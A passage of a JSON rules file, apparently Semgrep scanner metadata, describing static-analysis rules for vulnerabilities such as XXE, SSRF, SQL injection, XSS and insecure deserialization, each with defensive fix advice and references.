[https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","id":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","name":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","id":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","name":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"help":{"markdown":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel)\n - [https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ](https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ)\n","text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","id":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","name":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"help":{"markdown":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw)\n - [https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===](https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===)\n - [https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027](https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027)\n","text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","id":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","name":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"help":{"markdown":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","id":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","name":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell","id":"ruby.lang.security.dangerous-subshell.dangerous-subshell","name":"ruby.lang.security.dangerous-subshell.dangerous-subshell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-subshell.dangerous-subshell"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint","id":"rust.hyper.sql.postgres-taint.postgres-taint","name":"rust.hyper.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"help":{"markdown":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","id":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","name":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","id":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","name":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"help":{"markdown":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection)\n - [https://laravel.com/docs/8.x/queries](https://laravel.com/docs/8.x/queries)\n","text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection","id":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","name":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-sql-injection.laravel-sql-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"help":{"markdown":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md)\n","text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","id":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","name":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-direct-response-write.laravel-direct-response-write"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","id":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","name":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"help":{"markdown":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone)\n - [https://pkg.go.dev/github.com/gorilla/sessions#Options](https://pkg.go.dev/github.com/gorilla/sessions#Options)\n","text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"helpUri":"https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","id":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","name":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"help":{"markdown":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses)\n","text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","id":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","name":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.xss.xss)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/javascript.browser.xss.xss","id":"javascript.browser.xss.xss","name":"javascript.browser.xss.xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.xss.xss"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"help":{"markdown":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization)\n - [https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/](https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)\n","text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"helpUri":"https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","id":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","name":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg","id":"javascript.jose.security.jwt-none-alg.jwt-none-alg","name":"javascript.jose.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic 